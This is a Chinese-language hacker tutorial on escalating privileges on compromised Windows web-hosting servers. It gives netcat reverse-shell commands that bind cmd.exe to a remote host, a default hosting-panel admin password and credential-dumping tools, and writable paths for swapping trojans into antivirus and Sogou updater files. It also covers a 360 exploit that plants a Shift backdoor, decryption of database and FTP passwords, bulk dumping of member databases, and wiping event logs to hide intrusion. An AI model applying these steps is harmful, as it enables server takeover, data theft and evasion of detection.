提权

(( nc反弹提权 ))

 

当可以执行net user，但是不能建立用户时，就可以用NC反弹提权试下，特别是内网服务器，最好用NC反弹提权。

 

不过这种方法, 只要对方装了防火墙, 或是屏蔽掉了除常用的那几个端口外的所有端口，那么这种方法也失效了….

 

找个可读可写目录上传nc.exe cmd.exe

 

 

-l 监听本地入栈信息

 

-p port打开本地端口

 

-t 以telnet形式应答入栈请求

 

-e 程序重定向

 

本地cmd执行：nc -vv -l -p 52 进行反弹

 

接着在shell里执行命令：c:\windows\temp\nc.exe -vv 服务器ip 999 -e c:\windows\temp\cmd.exe 最好是80或8080这样的端口，被防火墙拦截的几率小很多

 

执行成功后本地cmd命令：cd/ （只是习惯而已）

 

接着以telnet命令连接服务器：telnet 服务器ip 999

 

回车出现已选定服务器的ip就说明成功了，接着权限比较大了，尝试建立用户！

 

坏蛋：

本地cmd执行：nc -vv -l -p 52 进行反弹

c:\windows\temp\nc.exe -e c:\windows\temp\cmd.exe 服务器ip 52

 

低调小飞：

shell执行命令c:\windows\temp\nc.exe -l -p 110 -t -e c:\windows\temp\cmd.exe

 

 

一般这样的格式执行成功率很小，不如直接在cmd那里输入：c:\windows\temp\nc.exe 命令这里输入：-vv 服务器ip 999 -e c:\windows\temp\cmd.exe

 

这个技巧成功率比上面那个大多了，不单单是nc可以这样，pr这些提权exp也是可以的。

 

 

 

 

 

(( 星外提权 ))

 

如何知道是不是星外主机

 

？

 

第一：网站物理路径存在“freehost”

第二：asp马里点击程序，存在“7i24虚拟主机管理平台”“星外主机”之类的文件夹

 

默认帐号：freehostrunat

默认密码：fa41328538d7be36e83ae91a78a1b16f!7

 

freehostrunat这个用户是安装星外时自动建立的，已属于administrators管理组，而且密码不需要解密，直接登录服务器即可

 

星外常写目录：

 

C:\RECYCLER\

C:\windows\temp\

e:\recycler\

f:\recycler\

C:\php\PEAR\

C:\WINDOWS\7i24.com\FreeHost

C:\php\dev

C:\System Volume Information

C:\7i24.com\serverdoctor\log\

C:\WINDOWS\Temp\

c:\windows\hchiblis.ibl

C:\7i24.com\iissafe\log\

C:\7i24.com\LinkGate\log

C:\Program Files\Thunder Network\Thunder7\

C:\Program Files\Thunder Network\Thunder\

C:\Program Files\Symantec AntiVirus\SAVRT\

c:\windows\DriverPacks\C\AM2

C:\Program Files\FlashFXP\

c:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\

C:\Program Files\Zend\ZendOptimizer-3.3.0\

C:\Program Files\Common Files\

c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

c:\Program Files\360\360Safe\deepscan\Section\mutex.db

c:\Program Files\Helicon\ISAPI_Rewrite3\error.log

c:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log

c:\Program Files\Helicon\ISAPI_Rewrite3\httpd.conf

c:\Program Files\Common Files\Symantec Shared\Persist.bak

c:\Program Files\Common Files\Symantec Shared\Validate.dat

c:\Program Files\Common Files\Symantec Shared\Validate.dat

C:\Program Files\Zend\ZendOptimizer-3.3.0\docs

C:\Documents and Settings\All Users\DRM\

C:\Documents and Settings\All Users\Application Data\McAfee\DesktopProtection

C:\Documents and Settings\All Users\Application Data\360safe\softmgr\

C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll

C:\Documents and Settings\All Users\Application Data\Microsoft\Media Index\

 

 

ee提权法：

 

找个可读可写目录上传ee.exe

 

cmd命令：/c c:\windows\temp\cookies\ee.exe -i （获取星外帐号的id值，例如回显：FreeHost ID：724）

 

接着命令：/c c:\windows\temp\cookies\ee.exe -u 724 （获取星外的帐号密码）

 

 

vbs提权法：

 

找个可读可写目录上传cscript.exe iispwd.vbs

 

cmd命令：/c "c:\windows\temp\cookies\cscript.exe" c:\windows\temp\cookies\iispwd.vbs

 

意思是读取iis，这样一来，不但可以获取星外的帐号密码，还可以看到同服务器上的所有站点的目录。

 

 

可行思路大全：

 

经测试以下目录中的文件权限均为everyone，可以修改，可以上传同文件名替换，删除，最重要的是还可以执行：

 

360杀毒db文件替换:

c:\Program Files\360\360SD\deepscan\Section\mutex.db

c:\Program Files\360\360Safe\deepscan\Section\mutex.db

C:\Program Files\360\360Safe\AntiSection\mutex.db

 

IISrewrite3 文件替换：

C:\Program Files\Helicon\ISAPI_Rewrite3\Rewrite.log

C:\Program Files\Helicon\ISAPI_Rew

 

rite3\httpd.conf

C:\Program Files\Helicon\ISAPI_Rewrite3\error.log

 

诺顿杀毒文件替换:

c:\Program Files\Common Files\Symantec Shared\Persist.bak

c:\Program Files\Common Files\Symantec Shared\Validate.dat

c:\Program Files\Common Files\Symantec Shared\Persist.Dat

 

一流过滤相关目录及文件：

C:\7i24.com\iissafe\log\startandiischeck.txt

C:\7i24.com\iissafe\log\scanlog.htm

 

其他:

Zend文件替换：C:\Program Files\Zend\ZendOptimizer-3.3.0\lib\Optimizer-3.3.0\php-5.2.x\ZendOptimizer.dll

华盾文件替换：C:\WINDOWS\hchiblis.ibl

Flash文件替换：C:\WINDOWS\system32\Macromed\Flash\Flash10q.ocx

DU Meter流量统计信息日志文件替换：c:\Documents and Settings\All Users\Application Data\Hagel Technologies\DU Meter\log.csv

 

 

 

 

 

(( 360提权 ))

 

找个可读可写目录上传360.exe

 

cmd命令：/c c:\windows\temp\cookies\360.exe

 

会提示3段英文：

 

360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2

 

You will get a Shift5 door!

 

Shift5 Backdoor created!

 

这是成功的征兆，接着连接服务器连按5下shift键，将弹出任务管理器，点击新建任务：explorer.exe 会出现桌面，接下来大家都会弄了......

 

 

 

 

 

(( 搜狗提权 ))

 

搜狗的目录默认是可读可写的，搜狗每隔一段时间就会自动升级，而升级的文件是pinyinup.exe

 

我们只要把这个文件替换为自己的远控木马，或是添加账户的批处理，等搜狗升级的时候，就可以达成我们的目的了。

 

 

 

 

 

(( 华众虚拟主机提权 ))

 

就经验来说，一般溢出提权对虚拟主机是无果的，而且华众又没有星外那么明显的漏洞。

 

所以华众提权关键之处就是搜集信息，主要注册表位置：

 

HKEY_LOCAL_MACHINE\SOFTWARE\HZHOST\CONFIG\

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpass root密码

HKEY_LOCAL_MACHINE\software\hzhost\config\settings\mssqlpss sa 密码

 

c:\windows\temp 下有hzhost主机留下的ftp登陆记录有用户名和密码

 

以上信息配合hzhosts华众虚拟主机系统6.x 破解数据库密码工具使用

 

百度搜索：hzhosts华众虚拟主机系统6.x 破解数据库密码工具

 

 

 

 

 

 

(( N点虚拟主机 ))

 

N点虚拟主机管理系统默认数据库地址为：\host_date\#host # date#.mdb

 

rl直接输入不行 这里咱们替换下 #=%23 空格=%20

 

修改后的下载地址为/host_date/%23host%20%23%20date%23196.mdb

 

N点数据库下载之后找到sitehost表 FTPuser&FTPpass 值 FTPpass是N点加密数据然后用N点解密工具解密得到FTP密码

 

N点默认安装路径C:\Program Files\NpointSoft\npointhost\web\

D:\Program Files\NpointSoft\npointhost\web\

默认权限可读。遇到对方所用虚拟主机是N点时候 可以考虑 读取该文件夹下载数据库

 

N点解密工具代码

<%

set iishost=server.CreateObject(“npoint.host”)

 

x=iishost.Eduserpassword(“FTPpass

 

值”,0)

 

response.write x

%>

 

本地搭建N点环境在N点目录打开访问即可。得到密码减去后10位字符即为 N点的虚拟主机管理密码。

然后需要在管理系统登陆确认下 在hostcs 表 找到 Hostip 或者hostdomain

一般默认是 Hostip=127.0.0.1 hostdomain=www.npointhost.com 这里可以不管 因为 这里不修改的话就是服务器默认ip地址sitehost 表的host_domain就是绑定的域名 直接查下IP地址即可 咱们批量的话 扫描的地址即可。

管理系统地址即为IP地址 选择虚拟主机 登录即可

接下来传shell大家应该都会了。

接下来说提权 hostcs表存有sa root账户的密码 解密方法一样。默认都是 解密结果123456

还有就是在adminlogo 存在N点系统管理密码 30位的cfs加密可以在http://www.md5.com.cn/cfs 碰撞下试试 或者用asm的工具破解下我的运气不好没成功过

3057C0DB854C878E72756088058775 这个是默认admin的密码

 

 

 

 

 

(( 拖库 ))

 

access数据库脱裤很简单，直接下载数据库即可，mssql数据库可以用shell自带的脱裤功能，也可以用asp脱裤脚本，找到数据库连接信息的文件，例如：web.config.asp

 

用帐号密码登录asp脱裤脚本，找到管理表，再找到会员库（UserInfo），之后导出即可，mysql数据库一般用php脚本，找网站数据连接信息：

 

'host' => 'localhost:3306', 数据库ip

'user' => 'iwebs', 用户

'passwd' => 'nnY5bvRNnJ4vKpmb', 密码

'name' => 'iwebshop', 数据库名

 

接着上传php脱裤脚本，进入拖库界面之后，左边有一个选择数据库名的选项，这里是iwebshop，选择数据库名之后，就会出现列表，想脱哪个就点击哪个，然后点击select data

 

Import是导入的意思，而Export是导出的意思，我们在拖库，当然是选择Export了，之后选择save，再点击Export就开始脱裤了。

 

如果服务器上安装了phpmysql，也可以找到该页面，用刚找到的root账号密码登录进去，在里面也是可以拖库的，如同上传php拖库脚本一样，操作差不多的。

 

 

 

 

 

(( 服务器 ))

 

命令提示符已被系统管理员停用？

解决方法：运行→gpedit.msc→用户配置→管理模板→系统，在右侧找到"阻止命令提示符", 然后双击一下,在"设置"里面选中"未配置" ,最后点击"确定"。

 

 

如何判断服务器的类型？

解决方法：直接ping服务器ip，看回显信息进行判断

 

TTL=32 9X/ME

 

TTL=64 linux

 

TTL=128 2000X/XP

 

TTL=255 UNIX

 

 

为什么有时3389开放却不能连接？

原因分析：有时候是因为防火墙，把3389转发到其他端口就可以连接了，有的转发后依然是连接不上，那是因为管理员在TCP/IP里设置的端口限制

解决方法：我们需要把端口转为TCP/IP里设置的

 

只允许连接的端口其中一个就可以了，更好的办法是取消端口限制。

 

 

最简单的往服务器上传东西方法是什么？

本机打开“HFS网络文件服务器”这款工具，把需要上传的工具直接拖进左边第一个框内，复制上面的地址，到服务器里的浏览器访问，就可以下载了

 

 

限制“命令提示符”的运行权限？

我的电脑（右键）--资源管理器中--点击“工具”按钮，选择“文件夹选项”，切换到“查看”标签，去掉“使用简单文件共享(推荐)”前面的钩，这一步是为了让文件的属性菜单中显示“安全”标签，然后进入“c:\windows\system32\”，找到“cmd.exe”，点右键选择“属性”，切换到“安全”标签，将其中“组或用户名称”中除了管理员外的所有用户都删除，完成后点“确定”这样当普通用户想运行“命令提示符”的时候将会出现“拒绝访问”的警告框。

 

 

如何更改windows2003最大连接数？

windows2003中的远程桌面功能非常方便，但是初始设置只允许2个用户同时登陆，有些时候因为我在公司连接登陆后断开，同事在家里用其他用户登陆后断开，当我再进行连接的时候，总是报错“终端服务超过最大连接数”这时候我和同事都不能登陆，通过以下方法来增加连接数，运行：services.msc，启用license logging，别忘了添加完毕后再关闭 License Logging

打开win2k3的控制面板中的“授权”，点“添加许可”输入要改的连接数

 

 

如何清除服务器里的IP记录日志？

1.我的电脑右键管理--事件查看器--安全性--右键清除所有事件

2.打开我的电脑--C盘--WINDOWS--system32--config--AppEvent.Evt属性--安全--全部都拒绝

3.Klaklog.evt属性--安全--全部都拒绝--SecEvent.Tvt属性--安全--全部都拒绝